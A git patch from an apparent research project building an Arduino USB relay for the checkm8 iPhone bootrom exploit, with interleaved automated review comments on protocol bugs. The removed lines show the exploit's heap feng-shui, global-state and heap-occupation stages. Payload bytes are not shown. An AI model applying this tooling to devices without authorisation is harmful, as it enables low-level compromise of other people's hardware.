From 578699bbc302662a9b4fc53df69cf889287fdca2 Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Mon, 30 Dec 2019 17:43:25 -0500 Subject: [PATCH] It works!!! --- checkm8_arduino/CMakeLists.txt | 4 +- checkm8_arduino/src/checkm8_arduino.ino | 286 ++++++------------------ checkm8_remote/bin/payloads | 1 - checkm8_remote/include/usb_helpers.h | 4 - checkm8_remote/src/usb_helpers.c | 61 +++-- include/ard_protocol.h | 2 + include/checkm8_config.h | 2 +- 7 files changed, 113 insertions(+), 247 deletions(-) delete mode 120000 checkm8_remote/bin/payloads diff --git a/checkm8_arduino/CMakeLists.txt b/checkm8_arduino/CMakeLists.txt index 0059cee..78c2f7d 100644 --- a/checkm8_arduino/CMakeLists.txt +++ b/checkm8_arduino/CMakeLists.txt @@ -1,5 +1,5 @@ cmake_minimum_required(VERSION 3.10) -set(CMAKE_TOOLCHAIN_FILE ${CMAKE_SOURCE_DIR}/cmake/ArduinoToolchain.cmake) +set(CMAKE_TOOLCHAIN_FILE cmake/ArduinoToolchain.cmake) set(CMAKE_CXX_STANDARD 98) project(checkm8_arduino) @@ -10,7 +10,7 @@ generate_arduino_library(checkm8_arduino_libhostshield) set(checkm8_arduino_BOARD uno) set(checkm8_arduino_HDRS include/User_Setup.h include/Usb.h) set(checkm8_arduino_LIBS checkm8_arduino_libhostshield) -set(checkm8_arduino_SKETCH ${CMAKE_CURRENT_SOURCE_DIR}/src/checkm8_arduino.ino) +set(checkm8_arduino_SKETCH src/checkm8_arduino.ino) set(checkm8_arduino_PROGRAMMER avrispmkii) set(checkm8_arduino_PORT /dev/ttyACM0) diff --git a/checkm8_arduino/src/checkm8_arduino.ino b/checkm8_arduino/src/checkm8_arduino.ino index 6d797c4..1793ebb 100644 --- a/checkm8_arduino/src/checkm8_arduino.ino +++ b/checkm8_arduino/src/checkm8_arduino.ino 
@@ -1,127 +1,20 @@ -#include "User_Setup.h" -#include "Usb.h" +#include "../include/User_Setup.h" +#include "../include/Usb.h" #include "checkm8_config.h" #include "ard_protocol.h" -#include USB Usb; USB_DEVICE_DESCRIPTOR desc_buf; uint8_t state, rcode, addr = 1; - -//uint8_t io_buf[0x100]; -// -//EpInfo *pep = NULL; -//uint16_t nak_limit = 0; -//uint8_t pktsize; -//uint16_t sz; -//const uint8_t *p; -//uint16_t part_sz; +uint8_t usb_data_buf[ARD_BUF_SIZE]; struct serial_desc_args sd_args; -uint16_t serial_desc_buf[256]; - struct usb_xfer_args usb_args; -uint8_t usb_data_buf[512]; -int i; +int i, chunk_i; +int size, chunk_size; char cmd; -//enum -//{ -// CHECKM8_INIT_RESET, -// CHECKM8_HEAP_FENG_SHUI, -// CHECKM8_SET_GLOBAL_STATE, -// CHECKM8_HEAP_OCCUPATION, -// CHECKM8_END -//}; -//uint8_t checkm8_state = CHECKM8_INIT_RESET; -// -// -//void heap_feng_shui_req(uint8_t sz) -//{ -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0x80, 6, 4, 3, 0x40a, sz); -// Usb.regWr(rHCTL, bmRCVTOG1); -// rcode = Usb.dispatchPkt(tokIN, 0, 0); -//} -// -//void heap_feng_shui() -//{ -// Serial.println("1. heap feng-shui"); -// heap_feng_shui_req(0xc0); -// heap_feng_shui_req(0xc0); -// for(int i = 0; i < 6; i++) -// heap_feng_shui_req(0xc1); -//} -// -//void set_global_state() -//{ -// Serial.println("2. set global state"); -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0x21, 1, 0, 0, 0, 0x800); -// rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); -// rcode = Usb.ctrlReq(addr, 0, 0x21, 4, 0, 0, 0, 0, 0, NULL, NULL); -//} -// -//void heap_occupation() -//{ -// Serial.println("3. 
heap occupation"); -// -// heap_feng_shui_req(0xc1); -// heap_feng_shui_req(0xc1); -// heap_feng_shui_req(0xc1); -// -// sz = sizeof(overwrite); -// p = overwrite; -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0, 9, 0, 0, 0, sz); -// Usb.regWr(rHCTL, bmSNDTOG0); -// send_out(io_buf, 0); -// while(sz) -// { -// pktsize = min(sz, 0x40); -// for(int i = 0; i < pktsize; i++) -// io_buf[i] = pgm_read_byte(&p[i]); -// send_out(io_buf, pktsize); -// if(rcode) -// { -// Serial.println("sending error"); -// checkm8_state = CHECKM8_END; -// return; -// } -// sz -= pktsize; -// p += pktsize; -// } -// -// sz = sizeof(payload); -// p = payload; -// -// while(sz) -// { -// part_sz = min(0x7ff, sz); -// sz -= part_sz; -// rcode = Usb.ctrlReq_SETUP(addr, 0, 0x21, 1, 0, 0, 0, part_sz); -// Usb.regWr(rHCTL, bmSNDTOG0); -// send_out(io_buf, 0); -// while(part_sz) -// { -// pktsize = min(part_sz, 0x40); -// for(int i = 0; i < pktsize; i++) -// io_buf[i] = pgm_read_byte(&p[i]); -// send_out(io_buf, pktsize); -// if(rcode) -// { -// Serial.println("sending error"); -// checkm8_state = CHECKM8_END; -// return; -// } -// part_sz -= pktsize; -// p += pktsize; -// } -// Serial.print("Payload loading... "); -// Serial.print(sizeof(payload) - sz); -// Serial.print("/"); -// Serial.println(sizeof(payload)); -// } -//} - void recv_args(uint8_t *target, int len) { for(i = 0; i < len; i = i + 1) @@ -133,6 +26,17 @@ void recv_args(uint8_t *target, int len) } } +uint8_t respond_rcode() +{ + if(rcode) + { + Serial.write(PROT_FAIL_USB); + Serial.write(rcode); + return 1; + } + else return 0; +} + uint8_t send_data(uint8_t *buf, uint8_t len) { Usb.bytesWr(rSNDFIFO, len, buf); 
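Review bot: The new bookkeeping variables `int i, chunk_i;` and `int size, chunk_size;` join `rcode`, `state` and `addr` as file-scope globals, and `i` in particular is both the loop counter of `recv_args()` (whose body continues into the next hunk) and the data index of the chunked send loop later in `loop()`; that only works because neither `send_data()` nor `respond_rcode()` touches `i`, which nothing enforces. Declaring the counters inside the functions that use them (`for(int k = 0; k < len; k++)` in `recv_args`, locals in the case body) removes the coupling, and `size` is a poor name for a global in a sketch that pulls library headers in wholesale. If the globals are deliberate to keep stack usage predictable on the Uno, a comment next to them should say so, e.g. `// shared scratch state, kept global to avoid stack growth on the Uno`.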
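Review bot: `respond_rcode()` defines the two-byte error frame (`PROT_FAIL_USB` followed by the raw `rcode`) that the host-side loops in usb_helpers.c parse, but nothing documents that the frame may be emitted several times before the final `PROT_SUCCESS`, which is exactly how the `PROT_NO_ERROR_*` cases use it by ignoring its return value. It also reads the global `rcode` instead of taking it as a parameter, so a caller that forgets to assign `rcode` first reports a stale code. Suggested header comment: `// Reports a non-zero rcode to the host as the frame {PROT_FAIL_USB, rcode} and returns 1; returns 0 and writes nothing when rcode == 0. The host must always consume the rcode byte, since its value may collide with a PROT_* code.` Consider `uint8_t respond_rcode(uint8_t code)` so the data dependency is explicit at each call site.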
@@ -177,22 +81,16 @@ void loop() (usb_args.wValue >> 8u) & 0xFFu, usb_args.wIndex, usb_args.data_len); - if(rcode) - { - Serial.write(PROT_FAIL_USB); - Serial.write(rcode); - break; - } + if(respond_rcode()) break; - Usb.regWr(rHCTL, bmRCVTOG1); - rcode = Usb.dispatchPkt(tokIN, 0, 0); - if(rcode) + if(usb_args.bmRequestType & 0x80u) { - Serial.write(PROT_FAIL_USB); - Serial.write(rcode); - break; + Usb.regWr(rHCTL, bmRCVTOG1); + rcode = Usb.dispatchPkt(tokIN, 0, 0); } + else rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); + if(respond_rcode()) break; Serial.write(PROT_SUCCESS); break; @@ -207,21 +105,21 @@ void loop() (usb_args.wValue >> 8u) & 0xFFu, usb_args.wIndex, usb_args.data_len); - rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); + respond_rcode(); + + if(usb_args.bmRequestType & 0x80u) + { + Usb.regWr(rHCTL, bmRCVTOG1); + rcode = Usb.dispatchPkt(tokIN, 0, 0); + } + else rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); + + respond_rcode(); Serial.write(PROT_SUCCESS); break; case PROT_NO_ERROR_CTRL_XFER_DATA: recv_args((uint8_t *) &usb_args, sizeof(struct usb_xfer_args)); - if(usb_args.data_len > sizeof(usb_data_buf)) - { - recv_args(NULL, usb_args.data_len); - Serial.write(PROT_ACK); - Serial.write(PROT_FAIL_TOOBIG); - break; - } - - recv_args(usb_data_buf, usb_args.data_len); Serial.write(PROT_ACK); rcode = Usb.ctrlReq_SETUP(addr, 0, 
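Review bot: The post-SETUP dispatch `if(usb_args.bmRequestType & 0x80u) { Usb.regWr(rHCTL, bmRCVTOG1); rcode = Usb.dispatchPkt(tokIN, 0, 0); } else rcode = Usb.dispatchPkt(tokOUTHS, 0, 0);` is now pasted verbatim into both the `PROT_PARTIAL_CTRL_XFER` and `PROT_NO_ERROR_CTRL_XFER` cases, and the only difference between the two cases is whether `respond_rcode()`'s return aborts the command. Hoisting those lines into a small `static uint8_t dispatch_after_setup(void)` that returns the rcode keeps the two cases in step the next time the toggle handling changes. `0x80u` is the bmRequestType direction bit and deserves a name such as `USB_SETUP_DEVICE_TO_HOST` rather than a magic number in two places. Both cases live inside `loop()`, whose switch begins before this hunk.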
@@ -231,48 +129,56 @@ void loop() (usb_args.wValue >> 8u) & 0xFFu, usb_args.wIndex, usb_args.data_len); + respond_rcode(); Usb.regWr(rHCTL, bmSNDTOG0); - send_data(usb_data_buf, 0); - send_data(usb_data_buf, usb_args.data_len); - Serial.write(PROT_SUCCESS); - break; + rcode = send_data(usb_data_buf, 0); + respond_rcode(); - case PROT_CTRL_XFER: - recv_args((uint8_t *) &usb_args, sizeof(struct usb_xfer_args)); - if(usb_args.data_len > sizeof(usb_data_buf)) + chunk_i = 0; + while(chunk_i < usb_args.data_len) { - // need to waste the data sent on the serial bus since the - // remote sends args and data consecutively and only checks - // for errors after receiving an ACK + if(usb_args.data_len - chunk_i > ARD_BUF_SIZE) chunk_size = ARD_BUF_SIZE; + else chunk_size = usb_args.data_len - chunk_i; - recv_args(NULL, usb_args.data_len); + recv_args(usb_data_buf, chunk_size); Serial.write(PROT_ACK); - Serial.write(PROT_FAIL_TOOBIG); - break; - } - recv_args(usb_data_buf, usb_args.data_len); - Serial.write(PROT_ACK); + // i is the current data index + i = 0; + while(i < chunk_size) + { + if(chunk_size - i > 64) size = 64; + else size = chunk_size - i; - rcode = Usb.ctrlReq(addr, 0, - usb_args.bmRequestType, - usb_args.bRequest, - usb_args.wValue & 0xFFu, - (usb_args.wValue >> 8u) & 0xFFu, - usb_args.wIndex, - usb_args.data_len, usb_args.data_len, - usb_data_buf, NULL); - if(rcode) - { - Serial.write(PROT_FAIL_USB); - Serial.write(rcode); - break; + rcode = send_data(&usb_data_buf[i], size); + respond_rcode(); + i += size; + } + + chunk_i += chunk_size; } Serial.write(PROT_SUCCESS); break; +// case PROT_CTRL_XFER: +// recv_args((uint8_t *) &usb_args, sizeof(struct usb_xfer_args)); +// if(receive_data_and_respond()) break; +// +// rcode = Usb.ctrlReq(addr, 0, +// usb_args.bmRequestType, +// usb_args.bRequest, +// usb_args.wValue & 0xFFu, +// (usb_args.wValue >> 8u) & 0xFFu, +// usb_args.wIndex, +// usb_args.data_len, usb_args.data_len, +// usb_data_buf, NULL); +// 
if(respond_rcode()) break; +// +// Serial.write(PROT_SUCCESS); +// break; + case PROT_RESET: Serial.write(PROT_ACK); @@ -302,13 +208,13 @@ void loop() } // multiplication by 2 is necessary here because iphone returns 16-bit characters - Usb.getStrDescr(addr, 0, sd_args.len * 2, desc_buf.iSerialNumber, 0x0409, (uint8_t *) serial_desc_buf); + Usb.getStrDescr(addr, 0, sd_args.len * 2, desc_buf.iSerialNumber, 0x0409, usb_data_buf); Serial.write(PROT_SUCCESS); // not sure what the first byte is; skip it for(i = 1; i < sd_args.len + 1; i++) { - Serial.write(serial_desc_buf[i]); + Serial.write(((uint16_t *) usb_data_buf)[i]); } break; 
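Review bot: A host that still sends `PROT_CTRL_XFER` now gets no reply at all, because its case is commented out and the `default:` branch's `Serial.write(PROT_FAIL_BADCMD)` is also commented out (visible as context in the following hunk), so the host's `while(read(...) == 0)` wait never returns; if the command is really retired, re-enable `default: Serial.write(PROT_FAIL_BADCMD); break;` (assuming the host-side readers handle that byte) or delete the dead block instead of keeping it as a comment. In the chunk loop, the hard-coded `64` in `if(chunk_size - i > 64) size = 64;` is presumably the endpoint-0 max packet size and should be a named constant alongside `ARD_BUF_SIZE`. The zero-length `send_data(usb_data_buf, 0)` after `bmSNDTOG0` has no comment explaining why it precedes the data phase; a one-liner stating its purpose would help the next reader. The enclosing `loop()` switch starts before this hunk.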
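Review bot: `Usb.getStrDescr(addr, 0, sd_args.len * 2, ...)` now writes into the shared 512-byte `usb_data_buf`, but nothing bounds `sd_args.len` (its type lives in `struct serial_desc_args`, not visible here), so a host value larger than 255 overruns the buffer, and the read-back loop `for(i = 1; i < sd_args.len + 1; i++)` reads 16-bit slot `sd_args.len`, which lies past the `len * 2` bytes actually fetched — an off-by-one worth checking against the host's definition of `len`. The call's return value is also dropped while every other USB call in this commit goes through `respond_rcode()`, so a failed descriptor fetch still answers `PROT_SUCCESS` followed by stale buffer contents. Suggest `if((uint16_t) sd_args.len * 2 + 2 > ARD_BUF_SIZE) { Serial.write(PROT_FAIL_TOOBIG); break; }` before the call and `rcode = Usb.getStrDescr(...); if(respond_rcode()) break;` after it, assuming the host's descriptor reader accepts a failure byte where it expects `PROT_SUCCESS`. The "not sure what the first byte is" comment can be resolved: a USB string descriptor begins with the bLength/bDescriptorType pair, which is the 16-bit slot the loop skips.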
@@ -316,55 +222,5 @@ void loop() // Serial.write(PROT_FAIL_BADCMD); // break; } - - -// Usb.getDevDescr(addr, 0, 0x12, (uint8_t * ) & desc_buf); -// if(desc_buf.idVendor != 0x5ac || desc_buf.idProduct != 0x1227) -// { -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// if(checkm8_state != CHECKM8_END) -// { -// Serial.print("Non Apple DFU found (vendorId: "); -// Serial.print(desc_buf.idVendor); -// Serial.print(", productId: "); -// Serial.print(desc_buf.idProduct); -// Serial.println(")"); -// delay(5000); -// } -// return; -// } -// switch(checkm8_state) -// { -// case CHECKM8_INIT_RESET: -// for(int i = 0; i < 3; i++) -// { -// digitalWrite(6, HIGH); -// delay(500); -// digitalWrite(6, LOW); -// delay(500); -// } -// checkm8_state = CHECKM8_HEAP_FENG_SHUI; -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// break; -// case CHECKM8_HEAP_FENG_SHUI: -// heap_feng_shui(); -// checkm8_state = CHECKM8_SET_GLOBAL_STATE; -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// break; -// case CHECKM8_SET_GLOBAL_STATE: -// set_global_state(); -// checkm8_state = CHECKM8_HEAP_OCCUPATION; -// while(Usb.getUsbTaskState() != USB_DETACHED_SUBSTATE_WAIT_FOR_DEVICE) -// { Usb.Task(); } -// break; -// case CHECKM8_HEAP_OCCUPATION: -// heap_occupation(); -// checkm8_state = CHECKM8_END; -// Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); -// break; -// case CHECKM8_END: -// digitalWrite(6, HIGH); -// break; -// } } } \ No newline at end of file diff --git a/checkm8_remote/bin/payloads b/checkm8_remote/bin/payloads deleted file mode 120000 index 4c48285..0000000 --- a/checkm8_remote/bin/payloads +++ /dev/null @@ -1 +0,0 @@ -/home/grg/Projects/School/NCSU/iphone_aes_sc/checkm8_tool/checkm8_remote/checkm8_payloads/bin \ No newline at end of file diff --git a/checkm8_remote/include/usb_helpers.h b/checkm8_remote/include/usb_helpers.h index cee8795..81c4f62 100644 --- a/checkm8_remote/include/usb_helpers.h 
+++ b/checkm8_remote/include/usb_helpers.h @@ -3,11 +3,7 @@ #include "checkm8.h" -#ifdef WITH_ARDUINO -#define MAX_PACKET_SIZE 512 -#else #define MAX_PACKET_SIZE 0x800 -#endif #ifndef WITH_ARDUINO #include "libusb.h" diff --git a/checkm8_remote/src/usb_helpers.c b/checkm8_remote/src/usb_helpers.c index 9fe4e2d..b5c36b5 100644 --- a/checkm8_remote/src/usb_helpers.c +++ b/checkm8_remote/src/usb_helpers.c @@ -367,18 +367,19 @@ int no_error_ctrl_transfer(struct pwned_device *dev, if(buf == PROT_ACK) { checkm8_debug_indent("\treceived ack\n"); + do + { + if(buf == PROT_FAIL_USB) + { + while(read(dev->ard_fd, &buf, 1) == 0); + checkm8_debug_indent("\treceived error %X but ignoring\n", buf); + } - while(read(dev->ard_fd, &buf, 1) == 0); - if(buf == PROT_SUCCESS) - { - checkm8_debug_indent("\tsuccess\n"); - return CHECKM8_SUCCESS; - } - else - { - checkm8_debug_indent("\tunexpected response %X\n", buf); - return CHECKM8_FAIL_PROT; - } + while(read(dev->ard_fd, &buf, 1) == 0); + } while(buf != PROT_SUCCESS); + + checkm8_debug_indent("\tsuccess\n"); + return CHECKM8_SUCCESS; } else { @@ -416,6 +417,7 @@ int no_error_ctrl_transfer_data(struct pwned_device *dev, "no_error_ctrl_transfer_data(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n", dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); #ifdef WITH_ARDUINO + int amount, index = 0; char buf; struct usb_xfer_args args; args.bmRequestType = bmRequestType; 
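Review bot: The new `do { ... } while(buf != PROT_SUCCESS);` loop in `no_error_ctrl_transfer` has no exit other than seeing `PROT_SUCCESS`: `while(read(dev->ard_fd, &buf, 1) == 0);` treats a negative return (EINTR, EAGAIN, or the Arduino being unplugged) as a successful read and leaves `buf` stale, and the old "unexpected response → `CHECKM8_FAIL_PROT`" branch is gone, so any stray byte is silently skipped and a silent device hangs the tool forever. Keep skipping the `{PROT_FAIL_USB, rcode}` frames, which are expected on this "no error" path, but fail on a read error or an unknown byte; the helper below needs `<errno.h>`, which may or may not already be included above this hunk. A bounded retry count or `poll()` timeout on top of that is worth considering since the same spin-read pattern appears in every command.
```c
/* Block until one byte arrives; read() returning 0 is treated as "nothing yet",
 * as the existing loops do, but a real error now surfaces as -1 instead of
 * leaving *out stale. */
static int ard_read_byte(struct pwned_device *dev, char *out)
{
    ssize_t n;
    do
    {
        n = read(dev->ard_fd, out, 1);
    } while(n == 0 || (n < 0 && errno == EINTR));
    return n == 1 ? 0 : -1;
}

        /* … unchanged: command/argument write and the PROT_ACK check … */
        for(;;)
        {
            if(ard_read_byte(dev, &buf) < 0) return CHECKM8_FAIL_PROT;
            if(buf == PROT_SUCCESS) break;
            if(buf != PROT_FAIL_USB)
            {
                checkm8_debug_indent("\tunexpected response %X\n", buf);
                return CHECKM8_FAIL_PROT;
            }
            /* the rcode byte is opaque and may collide with a PROT_* value: always consume it */
            if(ard_read_byte(dev, &buf) < 0) return CHECKM8_FAIL_PROT;
            checkm8_debug_indent("\treceived error %X but ignoring\n", buf);
        }
        checkm8_debug_indent("\tsuccess\n");
        return CHECKM8_SUCCESS;
```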
@@ -427,29 +429,40 @@ int no_error_ctrl_transfer_data(struct pwned_device *dev, checkm8_debug_indent("\tsending data to arduino\n"); write(dev->ard_fd, &PROT_NO_ERROR_CTRL_XFER_DATA, 1); write(dev->ard_fd, &args, sizeof(struct usb_xfer_args)); - write(dev->ard_fd, data, data_len); while(read(dev->ard_fd, &buf, 1) == 0); if(buf == PROT_ACK) { - checkm8_debug_indent("\treceived ack\n"); + checkm8_debug_indent("\treceived argument ack\n"); + + while(index < data_len) + { + if(data_len - index > ARD_BUF_SIZE) amount = ARD_BUF_SIZE; + else amount = data_len - index; + + checkm8_debug_indent("\twriting data chunk of size %i\n", amount); + write(dev->ard_fd, &data[index], amount); + do + { + if(buf == PROT_FAIL_USB) + { + while(read(dev->ard_fd, &buf, 1) == 0); + checkm8_debug_indent("\treceived error %X but ignoring\n", buf); + } + + while(read(dev->ard_fd, &buf, 1) == 0); + } while(buf != PROT_ACK); + + checkm8_debug_indent("\treceived data ack\n"); + index += amount; + } while(read(dev->ard_fd, &buf, 1) == 0); - if(buf == PROT_FAIL_TOOBIG) - { - checkm8_debug_indent("\tdata packet is too big\n"); - return CHECKM8_FAIL_INVARGS; - } - else if(buf == PROT_SUCCESS) + if(buf == PROT_SUCCESS) { checkm8_debug_indent("\tsuccess\n"); return CHECKM8_SUCCESS; } - else - { - checkm8_debug_indent("\tunexpected response %X\n", buf); - return CHECKM8_FAIL_PROT; - } } else { diff --git a/include/ard_protocol.h b/include/ard_protocol.h index f4f3258..e3d0dc9 100644 --- a/include/ard_protocol.h +++ b/include/ard_protocol.h @@ -1,6 +1,8 @@ #ifndef CHECKM8_TOOL_ARD_PROTOCOL_H #define CHECKM8_TOOL_ARD_PROTOCOL_H +#define ARD_BUF_SIZE 512 + static const char PROT_PARTIAL_CTRL_XFER = 'P'; static const char PROT_NO_ERROR_CTRL_XFER = 'N'; static const char PROT_NO_ERROR_CTRL_XFER_DATA = 'M'; diff --git a/include/checkm8_config.h b/include/checkm8_config.h index 1cb13ca..7546d0b 100644 --- a/include/checkm8_config.h +++ b/include/checkm8_config.h 
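Review bot: The final `while(read(dev->ard_fd, &buf, 1) == 0); if(buf == PROT_SUCCESS)` in `no_error_ctrl_transfer_data` does not tolerate the `{PROT_FAIL_USB, rcode}` frames that the sketch emits after each failed 64-byte send (the Arduino calls `respond_rcode()` per packet *after* writing the chunk's `PROT_ACK`), even though the chunk loop right above it skips exactly those frames; when the last chunk produces one, `buf` is `PROT_FAIL_USB`, the success test fails, and the rcode and `PROT_SUCCESS` bytes stay in the serial buffer to desynchronise the next command. The same happens for `data_len == 0`, where the Arduino can emit frames from `ctrlReq_SETUP` and the zero-length send before `PROT_SUCCESS`. The `else { return CHECKM8_FAIL_PROT; }` that used to follow was also removed, so on any unexpected byte control now falls out of the `if(buf == PROT_ACK)` block into whatever follows this hunk, which I cannot see and which may be the end of a non-void function. Reuse the skip loop and restore the failure return.
```c
            /* … unchanged: chunked write loop ending with "received data ack" … */

            /* The Arduino reports each failed 64-byte send as {PROT_FAIL_USB, rcode}
             * after the chunk's PROT_ACK, so those frames can still precede PROT_SUCCESS
             * here exactly as they can inside the loop above. */
            do
            {
                if(buf == PROT_FAIL_USB)
                {
                    while(read(dev->ard_fd, &buf, 1) == 0);
                    checkm8_debug_indent("\treceived error %X but ignoring\n", buf);
                }
                while(read(dev->ard_fd, &buf, 1) == 0);
            } while(buf == PROT_FAIL_USB);

            if(buf == PROT_SUCCESS)
            {
                checkm8_debug_indent("\tsuccess\n");
                return CHECKM8_SUCCESS;
            }

            checkm8_debug_indent("\tunexpected response %X\n", buf);
            return CHECKM8_FAIL_PROT;
```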
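Review bot: `#define ARD_BUF_SIZE 512` is the one constant both ends now rely on — the sketch sizes `usb_data_buf[ARD_BUF_SIZE]` with it and the host splits control-transfer data into chunks of at most that many bytes — but it carries no comment, and the serial-descriptor path additionally treats the same buffer as 16-bit units. A one-line comment pins the contract for whoever changes it next: `/* Size of the Arduino's single USB scratch buffer; the host never sends more than this many data bytes per chunk, and string descriptors are read from it as ARD_BUF_SIZE/2 16-bit units. */`.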
@@ -4,7 +4,7 @@ //#define LIBUSB_LOGGING #define CHECKM8_LOGGING -//#define WITH_ARDUINO +#define WITH_ARDUINO #define ARDUINO_DEV "/dev/ttyACM0" #define ARDUINO_BAUD 115200